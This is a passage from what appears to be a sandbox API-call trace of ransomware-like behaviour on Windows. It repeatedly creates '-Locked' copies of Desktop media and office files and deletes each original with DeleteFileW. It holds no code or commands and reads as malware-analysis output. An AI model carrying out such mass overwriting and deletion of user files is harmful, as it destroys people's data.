dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x444 [0298.802] GetFileType (hFile=0x444) returned 0x1 [0298.802] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0298.802] GetFileType (hFile=0x444) returned 0x1 [0298.804] CloseHandle (hObject=0x444) returned 1 [0298.804] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\G2jIFnab-iHgfnotUdc.wav", nBufferLength=0x105, lpBuffer=0x1aed50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\G2jIFnab-iHgfnotUdc.wav", lpFilePart=0x0) returned 0x35 [0298.804] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\G2jIFnab-iHgfnotUdc.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\g2jifnab-ihgfnotudc.wav")) returned 1 [0298.806] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\h aXUsMO6g.png-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\h aXUsMO6g.png-Locked", lpFilePart=0x0) returned 0x33 [0298.806] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0298.806] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\h aXUsMO6g.png-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\h axusmo6g.png-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x444 [0298.807] GetFileType (hFile=0x444) returned 0x1 [0298.807] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0298.807] GetFileType (hFile=0x444) returned 0x1 [0298.808] CloseHandle (hObject=0x444) returned 1 [0298.809] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\h aXUsMO6g.png", nBufferLength=0x105, lpBuffer=0x1aed50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\h aXUsMO6g.png", lpFilePart=0x0) returned 0x2c [0298.809] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\h aXUsMO6g.png" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\h axusmo6g.png")) returned 1 [0298.813] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\HElJnZ.bmp-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\HElJnZ.bmp-Locked", lpFilePart=0x0) returned 0x2f [0298.813] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0298.813] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\HElJnZ.bmp-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\heljnz.bmp-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x444 [0298.814] GetFileType (hFile=0x444) returned 0x1 [0298.814] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0298.814] GetFileType (hFile=0x444) returned 0x1 [0298.816] CloseHandle (hObject=0x444) returned 1 [0298.816] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\HElJnZ.bmp", nBufferLength=0x105, lpBuffer=0x1aed50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\HElJnZ.bmp", lpFilePart=0x0) returned 0x28 [0298.816] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\HElJnZ.bmp" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\heljnz.bmp")) returned 1 [0298.817] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\HhodZgzF8 9dLBFX.avi-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\HhodZgzF8 9dLBFX.avi-Locked", lpFilePart=0x0) returned 0x39 [0298.818] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0298.818] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\HhodZgzF8 9dLBFX.avi-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\hhodzgzf8 9dlbfx.avi-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x444 [0298.818] GetFileType (hFile=0x444) returned 0x1 [0298.819] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0298.819] GetFileType (hFile=0x444) returned 0x1 [0298.820] CloseHandle (hObject=0x444) returned 1 [0298.820] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\HhodZgzF8 9dLBFX.avi", nBufferLength=0x105, lpBuffer=0x1aed50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\HhodZgzF8 9dLBFX.avi", lpFilePart=0x0) returned 0x32 [0298.821] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\HhodZgzF8 9dLBFX.avi" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\hhodzgzf8 9dlbfx.avi")) returned 1 [0298.822] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\iWyhboFMJLgPq_b7Ud9.avi-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\iWyhboFMJLgPq_b7Ud9.avi-Locked", lpFilePart=0x0) returned 0x3c [0298.822] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0298.822] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\iWyhboFMJLgPq_b7Ud9.avi-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\iwyhbofmjlgpq_b7ud9.avi-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x444 [0298.823] GetFileType (hFile=0x444) returned 0x1 [0298.823] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0298.824] GetFileType (hFile=0x444) returned 0x1 [0298.825] CloseHandle (hObject=0x444) returned 1 [0298.825] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\iWyhboFMJLgPq_b7Ud9.avi", nBufferLength=0x105, lpBuffer=0x1aed50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\iWyhboFMJLgPq_b7Ud9.avi", lpFilePart=0x0) returned 0x35 [0298.825] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\iWyhboFMJLgPq_b7Ud9.avi" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\iwyhbofmjlgpq_b7ud9.avi")) returned 1 [0298.827] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\IZrQfjN.m4a-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\IZrQfjN.m4a-Locked", lpFilePart=0x0) returned 0x30 [0298.827] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0298.827] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\IZrQfjN.m4a-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\izrqfjn.m4a-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x444 [0298.828] GetFileType (hFile=0x444) returned 0x1 [0298.828] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0298.828] GetFileType (hFile=0x444) returned 0x1 [0298.830] CloseHandle (hObject=0x444) returned 1 [0298.832] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\IZrQfjN.m4a", nBufferLength=0x105, lpBuffer=0x1aed50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\IZrQfjN.m4a", lpFilePart=0x0) returned 0x29 [0298.832] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\IZrQfjN.m4a" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\izrqfjn.m4a")) returned 1 [0298.834] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\L0Cw.docx-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\L0Cw.docx-Locked", lpFilePart=0x0) returned 0x2e [0298.834] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0298.834] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\L0Cw.docx-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\l0cw.docx-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x444 [0298.835] GetFileType (hFile=0x444) returned 0x1 [0298.835] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0298.835] GetFileType (hFile=0x444) returned 0x1 [0298.837] CloseHandle (hObject=0x444) returned 1 [0298.837] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\L0Cw.docx", nBufferLength=0x105, lpBuffer=0x1aed50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\L0Cw.docx", lpFilePart=0x0) returned 0x27 [0298.838] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\L0Cw.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\l0cw.docx")) returned 1 [0298.839] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\L3CXAN4c0b0rw2-.mkv-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\L3CXAN4c0b0rw2-.mkv-Locked", lpFilePart=0x0) returned 0x38 [0298.839] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0298.839] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\L3CXAN4c0b0rw2-.mkv-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\l3cxan4c0b0rw2-.mkv-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x444 [0298.840] GetFileType (hFile=0x444) returned 0x1 [0298.841] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0298.841] GetFileType (hFile=0x444) returned 0x1 [0298.842] CloseHandle (hObject=0x444) returned 1 [0298.843] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\L3CXAN4c0b0rw2-.mkv", nBufferLength=0x105, lpBuffer=0x1aed50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\L3CXAN4c0b0rw2-.mkv", lpFilePart=0x0) returned 0x31 [0298.843] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\L3CXAN4c0b0rw2-.mkv" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\l3cxan4c0b0rw2-.mkv")) returned 1 [0298.845] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\L_wFYu3lS.pptx-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\L_wFYu3lS.pptx-Locked", lpFilePart=0x0) returned 0x33 [0298.845] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0298.845] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\L_wFYu3lS.pptx-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\l_wfyu3ls.pptx-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x444 [0298.846] GetFileType (hFile=0x444) returned 0x1 [0298.846] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0298.846] GetFileType (hFile=0x444) returned 0x1 [0298.847] CloseHandle (hObject=0x444) returned 1 [0298.848] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\L_wFYu3lS.pptx", nBufferLength=0x105, lpBuffer=0x1aed50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\L_wFYu3lS.pptx", lpFilePart=0x0) returned 0x2c [0298.848] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\L_wFYu3lS.pptx" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\l_wfyu3ls.pptx")) returned 1 [0298.850] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\MyZQDkF.mp3-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\MyZQDkF.mp3-Locked", lpFilePart=0x0) returned 0x30 [0298.850] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0298.850] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\MyZQDkF.mp3-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\myzqdkf.mp3-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x444 [0298.851] GetFileType (hFile=0x444) returned 0x1 [0298.851] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0298.851] GetFileType (hFile=0x444) returned 0x1 [0298.852] CloseHandle (hObject=0x444) returned 1 [0298.853] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\MyZQDkF.mp3", nBufferLength=0x105, lpBuffer=0x1aed50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\MyZQDkF.mp3", lpFilePart=0x0) returned 0x29 [0298.853] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\MyZQDkF.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\myzqdkf.mp3")) returned 1 [0298.854] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\nRKT5nI-9Sno8sTzM1P5.wav-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\nRKT5nI-9Sno8sTzM1P5.wav-Locked", lpFilePart=0x0) returned 0x3d [0298.854] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0298.854] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\nRKT5nI-9Sno8sTzM1P5.wav-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\nrkt5ni-9sno8stzm1p5.wav-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x444 [0298.855] GetFileType (hFile=0x444) returned 0x1 [0298.855] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0298.855] GetFileType (hFile=0x444) returned 0x1 [0298.857] CloseHandle (hObject=0x444) returned 1 [0298.857] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\nRKT5nI-9Sno8sTzM1P5.wav", nBufferLength=0x105, lpBuffer=0x1aed50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\nRKT5nI-9Sno8sTzM1P5.wav", lpFilePart=0x0) returned 0x36 [0298.857] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\nRKT5nI-9Sno8sTzM1P5.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\nrkt5ni-9sno8stzm1p5.wav")) returned 1 [0298.858] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\OqWYTp.bmp-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\OqWYTp.bmp-Locked", lpFilePart=0x0) returned 0x2f [0298.859] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0298.859] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\OqWYTp.bmp-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\oqwytp.bmp-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x444 [0298.860] GetFileType (hFile=0x444) returned 0x1 [0298.860] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0298.860] GetFileType (hFile=0x444) returned 0x1 [0298.861] CloseHandle (hObject=0x444) returned 1 [0298.862] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\OqWYTp.bmp", nBufferLength=0x105, lpBuffer=0x1aed50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\OqWYTp.bmp", lpFilePart=0x0) returned 0x28 [0298.862] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\OqWYTp.bmp" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\oqwytp.bmp")) returned 1 [0298.864] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\SkBr_ODTO7.ppt-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\SkBr_ODTO7.ppt-Locked", lpFilePart=0x0) returned 0x33 [0298.864] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0298.864] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\SkBr_ODTO7.ppt-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\skbr_odto7.ppt-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x444 [0298.865] GetFileType (hFile=0x444) returned 0x1 [0298.865] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0298.865] GetFileType (hFile=0x444) returned 0x1 [0298.867] CloseHandle (hObject=0x444) returned 1 [0298.867] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\SkBr_ODTO7.ppt", nBufferLength=0x105, lpBuffer=0x1aed50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\SkBr_ODTO7.ppt", lpFilePart=0x0) returned 0x2c [0298.867] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\SkBr_ODTO7.ppt" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\skbr_odto7.ppt")) returned 1 [0298.869] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\SoNi.jpg-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\SoNi.jpg-Locked", lpFilePart=0x0) returned 0x2d [0298.869] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0298.869] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\SoNi.jpg-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\soni.jpg-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x444 [0298.871] GetFileType (hFile=0x444) returned 0x1 [0298.871] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0298.871] GetFileType (hFile=0x444) returned 0x1 [0298.873] CloseHandle (hObject=0x444) returned 1 [0298.873] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\SoNi.jpg", nBufferLength=0x105, lpBuffer=0x1aed50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\SoNi.jpg", lpFilePart=0x0) returned 0x26 [0298.873] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\SoNi.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\soni.jpg")) returned 1 [0298.878] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\sTLRgmy.flv-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\sTLRgmy.flv-Locked", lpFilePart=0x0) returned 0x30 [0298.878] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0298.878] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\sTLRgmy.flv-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\stlrgmy.flv-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x444 [0298.880] GetFileType (hFile=0x444) returned 0x1 [0298.880] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0298.880] GetFileType (hFile=0x444) returned 0x1 [0298.882] CloseHandle (hObject=0x444) returned 1 [0298.883] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\sTLRgmy.flv", nBufferLength=0x105, lpBuffer=0x1aed50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\sTLRgmy.flv", lpFilePart=0x0) returned 0x29 [0298.883] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\sTLRgmy.flv" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\stlrgmy.flv")) returned 1 [0298.886] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\tmhBBPCr.mp4-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\tmhBBPCr.mp4-Locked", lpFilePart=0x0) returned 0x31 [0298.886] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0298.886] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\tmhBBPCr.mp4-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\tmhbbpcr.mp4-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x444 [0298.888] GetFileType (hFile=0x444) returned 0x1 [0298.888] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0298.888] GetFileType (hFile=0x444) returned 0x1 [0298.890] CloseHandle (hObject=0x444) returned 1 [0298.891] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\tmhBBPCr.mp4", nBufferLength=0x105, lpBuffer=0x1aed50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\tmhBBPCr.mp4", lpFilePart=0x0) returned 0x2a [0298.891] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\tmhBBPCr.mp4" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\tmhbbpcr.mp4")) returned 1 [0298.893] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\TujlyxlbhAxVP9v1.mp4-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\TujlyxlbhAxVP9v1.mp4-Locked", lpFilePart=0x0) returned 0x39 [0298.893] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0298.893] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\TujlyxlbhAxVP9v1.mp4-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\tujlyxlbhaxvp9v1.mp4-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x444 [0298.895] GetFileType (hFile=0x444) returned 0x1 [0298.895] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0298.895] GetFileType (hFile=0x444) returned 0x1 [0298.897] CloseHandle (hObject=0x444) returned 1 [0298.897] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\TujlyxlbhAxVP9v1.mp4", nBufferLength=0x105, lpBuffer=0x1aed50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\TujlyxlbhAxVP9v1.mp4", lpFilePart=0x0) returned 0x32 [0298.897] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\TujlyxlbhAxVP9v1.mp4" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\tujlyxlbhaxvp9v1.mp4")) returned 1 [0298.900] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\V0zO8w_tvkIQjvRX6KqC.jpg-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\V0zO8w_tvkIQjvRX6KqC.jpg-Locked", lpFilePart=0x0) returned 0x3d [0298.901] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0298.901] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\V0zO8w_tvkIQjvRX6KqC.jpg-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\v0zo8w_tvkiqjvrx6kqc.jpg-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x444 [0298.902] GetFileType (hFile=0x444) returned 0x1 [0298.902] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0298.902] GetFileType (hFile=0x444) returned 0x1 [0298.904] CloseHandle (hObject=0x444) returned 1 [0298.905] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\V0zO8w_tvkIQjvRX6KqC.jpg", nBufferLength=0x105, lpBuffer=0x1aed50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\V0zO8w_tvkIQjvRX6KqC.jpg", lpFilePart=0x0) returned 0x36 [0298.905] DeleteFileW 